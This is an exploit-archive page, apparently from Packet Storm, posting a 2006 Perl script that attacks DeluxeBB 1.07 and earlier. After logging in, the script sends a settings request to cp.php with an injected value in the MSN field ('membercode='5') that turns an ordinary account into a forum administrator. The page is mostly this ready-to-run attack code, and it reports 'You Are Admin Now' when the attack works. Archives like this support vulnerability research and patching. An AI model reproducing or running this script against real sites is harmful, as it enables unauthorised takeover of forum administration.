exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

hx.pl.txt

hx.pl.txt
Posted Jun 27, 2006
Authored by Hessam-x | Site h4ckerz.com

DeluxeBB versions 1.07 and below Create Admin exploit that utilizes cp.php.

tags | exploit, php
SHA-256 | 396573fa2da3ec314b74797f7bab74f27b01e03226629f3faf005fb127992782
Download | Favorite | View

hx.pl.txt

Change Mirror Download
#!/usr/bin/perl
# DeluxeBB <= 1.07 Create Admin Exploit
#
## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
# ./2006-6-25
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


 $host = $ARGV[0];
 $uname = $ARGV[1];
 $passwd = $ARGV[2];
 $url = "http://".$host;
 
 print q(
 ###########################################################
 #          DeluxeBB <= 1.07 Create Admin Exploit          # 
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

);


 
 if (@ARGV < 3) {
 print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n"; 
  exit();
 }
 
  
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";



 # Login In DeluxeBB <= 1.07 Create Admin Exploit
 
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();

 $xpl->cookie_jar( $cookie_jar );
 $res = $xpl->post($url.'misc.php',
 Content => [
 "sub" => "login",
 "name" => "$uname",
 "password" => "$passwd",
 "submit" => "Log-in",
 "redirect" => "",
 "expiry" => "990090909",
 ],);
 
  if($cookie_jar->as_string =~ /memberpw=(.*?);/) { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n"; 
  print $cookie_jar->as_string;
  exit(); 
  }

  # Creat Admin :)

$req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12&invisiblebrowse=0&markposts=15&submit=Update');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin Cp/) { 
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    14 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    20 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close